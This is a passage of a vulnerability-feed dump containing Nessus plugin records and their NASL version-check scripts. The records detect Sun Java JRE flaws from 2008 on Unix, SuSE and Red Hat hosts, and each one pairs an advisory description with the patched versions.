'unpack200' JAR unpacking\n utility and may allow an untrusted applet or application\n to elevate its privileges with unpacking applets and\n Java Web Start applications. (244992)\n\n - The UTF-8 decoder accepts encodings longer than the\n 'shortest' form. Although not a vulnerability per se,\n it may be leveraged to exploit software that relies on\n the JRE UTF-8 decoder to reject the 'non-shortest form'\n sequence. (245246)\n\n - An untrusted applet or application may be able to list\n the contents of the home directory of the user running\n the applet or application. (246266)\n\n - A denial of service vulnerability may be triggered when\n the JRE handles certain RSA public keys. (246286)\n\n - A vulnerability may be triggered while authenticating\n users through Kerberos and lead to a system-wide denial\n of service due to excessive consumption of operating\n system resources. (246346)\n\n - Security vulnerabilities in the JAX-WS and JAXB packages\n where internal classes can be accessed may allow an\n untrusted applet or application to elevate privileges.\n (246366)\n\n - An untrusted applet or application when parsing zip\n files may be able to read arbitrary memory locations in\n the process that the applet or application is running.\n (246386)\n\n - The JRE allows code loaded from the local filesystem to\n access localhost. (246387)", "edition": 26, "published": "2013-02-22T00:00:00", "title": "Sun Java JRE Multiple Vulnerabilities (244986 et al) (Unix)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:jre"], "id": "SUN_JAVA_JRE_244986_UNIX.NASL", "href": "https://www.tenable.com/plugins/nessus/64828", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64828);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/12/04\");\n\n script_cve_id(\n \"CVE-2008-2086\",\n \"CVE-2008-5339\",\n \"CVE-2008-5340\",\n \"CVE-2008-5341\",\n \"CVE-2008-5342\",\n \"CVE-2008-5343\",\n \"CVE-2008-5344\",\n \"CVE-2008-5345\",\n \"CVE-2008-5346\",\n \"CVE-2008-5347\",\n \"CVE-2008-5348\",\n \"CVE-2008-5349\",\n \"CVE-2008-5350\",\n \"CVE-2008-5351\",\n \"CVE-2008-5352\",\n \"CVE-2008-5353\",\n \"CVE-2008-5354\",\n \"CVE-2008-5355\",\n \"CVE-2008-5356\",\n \"CVE-2008-5357\",\n \"CVE-2008-5358\",\n \"CVE-2008-5359\",\n \"CVE-2008-5360\"\n );\n script_bugtraq_id(\n 30633,\n 32608,\n 32620,\n 32892\n );\n\n script_name(english:\"Sun Java JRE Multiple Vulnerabilities (244986 et al) (Unix)\");\n script_summary(english:\"Checks version of Sun JRE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Unix host contains a runtime environment that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Sun Java Runtime Environment (JRE) installed on the\nremote host is earlier than 6 Update 11 / 5.0 Update 17 / 1.4.2_19 /\n1.3.1_24. Such versions are potentially affected by the following\nsecurity issues :\n\n - The JRE creates temporary files with insufficiently\n random names. (244986)\n\n - There are multiple buffer overflow vulnerabilities\n involving the JRE's image processing code, its\n handling of GIF images, and its font processing.\n (244987)\n\n - It may be possible for an attacker to bypass security\n checks due to the manner in which it handles the\n 'non-shortest form' of UTF-8 byte sequences.\n\n - There are multiple security vulnerabilities in Java\n Web Start and Java Plug-in that may allow for privilege\n escalation. (244988)\n\n - The JRE Java Update mechanism does not check the digital\n signature of the JRE that it downloads. (244989)\n\n - A buffer overflow may allow an untrusted Java\n application that is launched through the command line to\n elevate its privileges. (244990)\n\n - A vulnerability related to deserializing calendar\n objects may allow an untrusted applet or application to\n elevate its privileges. (244991)\n\n - A buffer overflow affects the 'unpack200' JAR unpacking\n utility and may allow an untrusted applet or application\n to elevate its privileges with unpacking applets and\n Java Web Start applications. (244992)\n\n - The UTF-8 decoder accepts encodings longer than the\n 'shortest' form. Although not a vulnerability per se,\n it may be leveraged to exploit software that relies on\n the JRE UTF-8 decoder to reject the 'non-shortest form'\n sequence. (245246)\n\n - An untrusted applet or application may be able to list\n the contents of the home directory of the user running\n the applet or application. (246266)\n\n - A denial of service vulnerability may be triggered when\n the JRE handles certain RSA public keys. (246286)\n\n - A vulnerability may be triggered while authenticating\n users through Kerberos and lead to a system-wide denial\n of service due to excessive consumption of operating\n system resources. (246346)\n\n - Security vulnerabilities in the JAX-WS and JAXB packages\n where internal classes can be accessed may allow an\n untrusted applet or application to elevate privileges.\n (246366)\n\n - An untrusted applet or application when parsing zip\n files may be able to read arbitrary memory locations in\n the process that the applet or application is running.\n (246386)\n\n - The JRE allows code loaded from the local filesystem to\n access localhost. (246387)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019736.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019737.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019738.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019739.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019740.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019741.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019742.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019759.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019793.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019794.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019797.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019798.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019799.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019800.1.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/6u11-139394.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/index.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Sun Java JDK / JRE 6 Update 11, JDK / JRE 5.0 Update 17, SDK\n/ JRE 1.4.2_19, or SDK / JRE 1.3.1_24 or later and remove, if necessary,\nany affected versions.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2008-5355\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sun_java_jre_installed_unix.nasl\");\n script_require_keys(\"Host/Java/JRE/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"Host/Java/JRE/Unmanaged/*\");\n\ninfo = \"\";\nvuln = 0;\nvuln2 = 0;\ninstalled_versions = \"\";\ngranular = \"\";\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"Host/Java/JRE/Unmanaged/\";\n if (ver !~ \"^[0-9.]+\") continue;\n installed_versions = installed_versions + \" & \" + ver;\n if (\n ver =~ \"^1\\.6\\.0_(0[0-9]|10)([^0-9]|$)\" ||\n ver =~ \"^1\\.5\\.0_(0[0-9]|1[0-6])([^0-9]|$)\" ||\n ver =~ \"^1\\.4\\.([01]_|2_(0[0-9]|1[0-8]([^0-9]|$)))\" ||\n ver =~ \"^1\\.3\\.(0_|1_([01][0-9]|2[0-3]([^0-9]|$)))\"\n )\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.6.0_11 / 1.5.0_17 / 1.4.2_19 / 1.3.1_24\\n';\n }\n else if (ver =~ \"^[\\d\\.]+$\")\n {\n dirs = make_list(get_kb_list(install));\n foreach dir (dirs)\n granular += \"The Oracle Java version \"+ver+\" at \"+dir+\" is not granular enough to make a determination.\"+'\\n';\n }\n else\n {\n dirs = make_list(get_kb_list(install));\n vuln2 += max_index(dirs);\n }\n\n}\n\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n if (granular) exit(0, granular);\n}\nelse\n{\n if (granular) exit(0, granular);\n\n installed_versions = substr(installed_versions, 3);\n if (vuln2 > 1)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:44:35", "description": "The version update to SUN Java 1.4.2sr19 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360 / CVE-2008-5359 /\nCVE-2008-5358 / CVE-2008-5357 / CVE-2008-5356 / CVE-2008-5344 /\nCVE-2008-5343 / CVE-2008-5342 / CVE-2008-5341 / CVE-2008-5340 /\nCVE-2008-5339 / CVE-2008-2086 / CVE-2008-5355 / CVE-2008-5354 /\nCVE-2008-5353 / CVE-2008-5352 / CVE-2008-5351 / CVE-2008-5350 /\nCVE-2008-5349 / CVE-2008-5348 / CVE-2008-5347 / CVE-2008-5345 /\nCVE-2008-5346)", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE 10 Security Update : Sun Java 1.4.2 (ZYPP Patch Number 5852)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_4_2-SUN-5852.NASL", "href": "https://www.tenable.com/plugins/nessus/41526", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41526);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"SuSE 10 Security Update : Sun Java 1.4.2 (ZYPP Patch Number 5852)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.4.2sr19 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360 / CVE-2008-5359 /\nCVE-2008-5358 / CVE-2008-5357 / CVE-2008-5356 / CVE-2008-5344 /\nCVE-2008-5343 / CVE-2008-5342 / CVE-2008-5341 / CVE-2008-5340 /\nCVE-2008-5339 / CVE-2008-2086 / CVE-2008-5355 / CVE-2008-5354 /\nCVE-2008-5353 / CVE-2008-5352 / CVE-2008-5351 / CVE-2008-5350 /\nCVE-2008-5349 / CVE-2008-5348 / CVE-2008-5347 / CVE-2008-5345 /\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2086.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5342.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5343.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5344.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5345.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5346.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5347.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5348.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5349.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5350.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5351.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5352.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5353.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5354.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5355.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5356.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5358.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5359.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5360.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5852.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_4_2-sun-1.4.2.19-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_4_2-sun-alsa-1.4.2.19-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_4_2-sun-demo-1.4.2.19-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_4_2-sun-devel-1.4.2.19-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_4_2-sun-jdbc-1.4.2.19-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_4_2-sun-plugin-1.4.2.19-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_4_2-sun-src-1.4.2.19-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_4_2-sun-1.4.2.19-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_4_2-sun-alsa-1.4.2.19-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_4_2-sun-devel-1.4.2.19-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_4_2-sun-jdbc-1.4.2.19-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_4_2-sun-plugin-1.4.2.19-0.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:06:22", "description": "Updated java-1.6.0-sun packages that correct several security issues\nare now available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Java Runtime Environment (JRE) contains the software and tools\nthat users need to run applets and applications written using the Java\nprogramming language.\n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute\narbitrary code. (CVE-2008-2086)\n\nAdditionally, these packages fix several other critical\nvulnerabilities. These are summarized in the 'Advance notification of\nSecurity Updates for Java SE' from Sun Microsystems.\n\nUsers of java-1.6.0-sun should upgrade to these updated packages,\nwhich correct these issues.", "edition": 28, "published": "2009-08-24T00:00:00", "title": "RHEL 4 / 5 : java-1.6.0-sun (RHSA-2008:1018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-08-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-devel", "cpe:/o:redhat:enterprise_linux:5.2", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-src", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-jdbc", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-plugin"], "id": "REDHAT-RHSA-2008-1018.NASL", "href": "https://www.tenable.com/plugins/nessus/40731", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:1018. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40731);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_bugtraq_id(32620, 32892);\n script_xref(name:\"RHSA\", value:\"2008:1018\");\n\n script_name(english:\"RHEL 4 / 5 : java-1.6.0-sun (RHSA-2008:1018)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-sun packages that correct several security issues\nare now available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Java Runtime Environment (JRE) contains the software and tools\nthat users need to run applets and applications written using the Java\nprogramming language.\n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute\narbitrary code. (CVE-2008-2086)\n\nAdditionally, these packages fix several other critical\nvulnerabilities. These are summarized in the 'Advance notification of\nSecurity Updates for Java SE' from Sun Microsystems.\n\nUsers of java-1.6.0-sun should upgrade to these updated packages,\nwhich correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2086\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5341\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5344\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5360\"\n );\n # http://blogs.sun.com/security/entry/advance_notification_of_security_updates3\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c8d7aabf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:1018\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", 